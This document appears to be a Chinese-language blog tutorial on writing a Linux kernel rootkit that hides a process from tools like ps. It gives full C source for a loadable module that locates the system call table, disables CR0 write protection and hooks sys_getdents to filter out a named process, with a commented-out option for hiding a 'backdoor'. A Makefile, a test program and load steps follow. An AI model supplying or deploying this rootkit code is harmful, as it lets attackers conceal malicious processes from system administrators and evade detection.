rootkit：實現隱藏進程

實現隱藏進程一般有兩個方法：

1，把要隱藏的進程PID設置為0，因為系統默認是不顯示PID為0的進程。

2，修改系統調用sys_getdents（）。

     Linux系統中用來查詢文件信息的系統調用是sys_getdents，這一點可以通過strace來觀察到，例如strace ls 將列出命令ls用到的系統調用，從中可以發現ls是通過getdents系統調用來操作的，對應於內核里的sys_getedents來執行。當查詢文件或者目錄的相關信息時，Linux系統用 sys_getedents來執行相應的查詢操作，並把得到的信息傳遞給用戶空間運行的程序，所以如果修改該系統調用，去掉結果中與某些特定文件的相關信 息，那么所有利用該系統調用的程序將看不見該文件，從而達到了隱藏的目的。首先介紹一下原來的系統調用，其原型為：
int sys_getdents(unsigned int fd, struct dirent *dirp,unsigned int count)
其中fd為指向目錄文件的文件描述符，該函數根據fd所指向的目錄文件讀取相應dirent結構，並放入dirp中，其中count為dirp中返回的數據量，正確時該函數返回值為填充到dirp的字節數

下面是具體的實現代碼：

hidep.c

/*
  進程隱藏程序
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <linux/dirent.h>//目錄文件結構
#include <linux/string.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <asm/uaccess.h>
#include <linux/unistd.h>
#define CALLOFF 100
int orig_cr0;
char psname[10]="just";//需要隱藏的進程名
//char psname[10]="backdoor";
char *processname=psname;

//module_param(processname, charp, 0);
struct {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed)) idtr;//__attribute__ ((packed))不需要內存對齊的優化

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none,flags;
    unsigned short off2;
} __attribute__ ((packed)) * idt;

struct linux_dirent{//文件結構體
    unsigned long     d_ino;//索引節點號
    unsigned long     d_off;//在目錄文件中的偏移
    unsigned short    d_reclen;//文件名長
    char    d_name[1];//文件名
};

void** sys_call_table;

unsigned int clear_and_return_cr0(void)//設置CR0，取消寫保護位，因為在較新的內核中，sys_call_table的內存是只讀的，
//所以要修改系統調用表就必須設置CR0
{
    unsigned int cr0 = 0;
    unsigned int ret;

    asm volatile ("movl %%cr0, %%eax"
            : "=a"(cr0)//eax到cr0
         );
    ret = cr0;//

    /*clear the 16th bit of CR0,*/
    cr0 &= 0xfffeffff;//設置CR0，第16位，WP（Write Protect）,它控制是否允許處理器向標志為只讀屬性的內存頁寫入數據,
    //0時表示禁用寫保護功能
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(cr0)//輸入，cr0到eax，eax到cr0
         );
    return ret;
}

void setback_cr0(unsigned int val)
{
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(val)//val值給eax，eax的值給CR0,恢復寫保護位
         );
}


asmlinkage long (*orig_getdents)(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count);

char * findoffset(char *start)//遍歷sys_call代碼，查找sys_call_table的地址
{  //也可以通過cat /boot/System.map-`uname -r` |grep sys_call_table  查看當前sys_call_table地址
    char *p;
    for (p = start; p < start + CALLOFF; p++)
    if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')//尋找call指令
        return p;
    return NULL;
}

int myatoi(char *str)//字符串轉整型
{
    int res = 0;
    int mul = 1;
    char *ptr;
    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
    {
        if (*ptr < '0' || *ptr > '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    if(res>0 && res< 9999)
        printk(KERN_INFO "pid=%d,",res);
    printk("\n");
    return (res);
}

struct task_struct *get_task(pid_t pid)//遍歷進程雙向循環鏈表，根據PID，查找需要隱藏的進程，並返回該進程控制塊
{
    struct task_struct *p = get_current(),*entry=NULL;
    list_for_each_entry(entry,&(p->tasks),tasks)
    {
        if(entry->pid == pid)
        {
            printk("pid found=%d\n",entry->pid);
            return entry;
        }
        else
        {
    //    printk(KERN_INFO "pid=%d not found\n",pid);
        }
    }
    return NULL;
}

static inline char *get_name(struct task_struct *p, char *buf)//獲取進程名
{
    int i;
    char *name;
    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;
        if (!c)
            break;
        if (c == '\\') {
            buf[1] = c;
            buf += 2;
            continue;
        }
        if (c == '\n')
        {
            buf[0] = '\\';
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    }
    while (i);
    *buf = '\n';
    return buf + 1;
}

int get_process(pid_t pid)//判斷是否找到隱藏進程
{
    struct task_struct *task = get_task(pid);
    //    char *buffer[64] = {0};
    char buffer[64];
    if (task)
    {
        get_name(task, buffer);
    //    if(pid>0 && pid<9999)
    //    printk(KERN_INFO "task name=%s\n",*buffer);
        if(strstr(buffer,processname))
            return 1;
        else
            return 0;
    }
    else
        return 0;
}

asmlinkage long hacked_getdents(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count)//修改的系統調用，替換原來的sys_getdents
{
    //added by lsc for process
    long value;
    //    struct inode *dinode;
    unsigned short len = 0;
    unsigned short tlen = 0;
//    struct linux_dirent *mydir = NULL;
//end
    value = (*orig_getdents) (fd, dirp, count);//調用sys_getdents,返回該目錄文件下目錄的總字節數
    tlen = value;
    while(tlen > 0)
    {
        len = dirp->d_reclen;//當前遍歷的目錄的長度
        tlen = tlen - len;
        printk("%s\n",dirp->d_name);

        if(get_process(myatoi(dirp->d_name)) )
        {
            printk("find process\n");
            memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);//覆蓋掉需要隱藏的進程
            value = value - len;
            printk(KERN_INFO "hide successful.\n");
        }
        if(tlen)
            dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);//移到后面一個目錄，繼續查找是否有其他同名的需要隱藏的進程
    }
    printk(KERN_INFO "finished hacked_getdents.\n");
    return value;
}


void **get_sct_addr(void)
{
    unsigned sys_call_off;
    unsigned sct = 0;
    char *p;
    asm("sidt %0":"=m"(idtr));//獲取中斷描述符表地址
    idt = (void *) (idtr.base + 8 * 0x80);//通過0x80中斷找到system_call的服務例程描述符項，一個中斷描述符8個字節
    sys_call_off = (idt->off2 << 16) | idt->off1;//找到對應的system_call代碼地址
    if ((p = findoffset((char *) sys_call_off)))//找到sys_call_table的地址
        sct = *(unsigned *) (p + 3);
    return ((void **)sct);
}


static int filter_init(void)
{
    sys_call_table = get_sct_addr();
    if (!sys_call_table)
    {
        printk("get_act_addr(): NULL...\n");
        return 0;
    }
    else
        printk("sct: 0x%x\n", (unsigned int)sys_call_table);
    orig_getdents = sys_call_table[__NR_getdents];//保存原來的系統調用

    orig_cr0 = clear_and_return_cr0();//取消寫保護位，並且返回原來的cr0
    sys_call_table[__NR_getdents] = hacked_getdents;//替換成我們自己寫的系統調用
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module loaded.\n");
                return 0;
}


static void filter_exit(void)
{
    orig_cr0 = clear_and_return_cr0();
    if (sys_call_table)
    sys_call_table[__NR_getdents] = orig_getdents;//恢復默認的系統調用
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module removed\n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");

對應的makefile：

KERNELDIR=/usr/src/linux-headers-3.2.0-39-generic-pae
PWD:=$(shell pwd)
obj-m :=hidep.o
modules:
    $(MAKE) -C $(KERNELDIR) M=$(PWD) modules
clean:
    rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c *.order *.symvers

對應的測試程序，即要隱藏的進程: just.c

#include<stdio.h>
int main()
{
    while(1);
    return 0;
}

1,編譯並在后台運行程序 just.c,會發現內核給just.c隨機分配了一個PID

2，此時 用ps 命令，可以清楚看到 程序just的PID。

2,編譯hidep.c 生成模塊hide.ko

3,把模塊hide.ko,用命令 insmod 加載進內核

4，再次 用 ps 命令，發現之前的PID被隱藏

5，最后不要忘了rmmod掉hidep.ko,當然重啟后內核也會把它丟了，不過最好養成不用就卸載掉的習慣。